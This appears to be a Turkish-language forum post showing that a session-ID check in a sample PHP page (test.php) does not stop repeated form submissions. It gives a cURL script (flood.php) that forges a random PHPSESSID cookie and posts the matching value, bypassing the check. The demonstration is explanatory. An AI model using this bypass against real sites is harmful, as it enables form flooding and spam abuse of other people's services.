ah mustafa ben anlatamayacağım bunlara mustafa

kaydet test.php
<?php
session_start();
$sid = session_id();
if ($_POST['sid'] == $sid)
{
    if (!$_SESSION['hede'])
    {
        fwrite(fopen("a.txt", "a"), "hede\n");
        echo 'Yazı Eklendi.';
    }
    else
    {
        echo 'Flood girişimi!';
    }
}
$_SESSION['hede'] = 'hede';
?>
kaydet flood.php
<?php
function getir($site)
{
    $fakeSID=md5(mt_rand(1,9999));
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $site);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_COOKIE, "PHPSESSID=$fakeSID");
    curl_setopt($ch,CURLOPT_POST, true);
    curl_setopt($ch,CURLOPT_POSTFIELDS,"sid=$fakeSID");
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}
echo getir('http://p/test.php');
?>
İlk önce normal browserden session kontrollü ve session korumalı(?) test.php yi çalıştırın. a.txt dosyası yazıldıktan sonra session hafızaya kaydedildiği için, session kontrolü sayesinde 2. bir işleme izin vermeyecek ve ekrana Flood girişimi! yazacaktır.

Şimdi flood.php yi çalıştırın seri bir şekilde sayfanızı sürekli yenileyin. a.txt dosyanızı açın bir yığın hede yazısını görürsünüz.

Anlatmak istediğim sessionid kontrol falan tıraş. Curl ile fake sessionid oluşturuluyor hafızaya alınıyor test.php deki session kontrolüde, curlun kaydettiği fakesessionid ile yine post ile yolladıgım aynı fakesessionid i eşleştiriyor, eşit oldugu için dediğiniz güvenlik tırt kalıyor.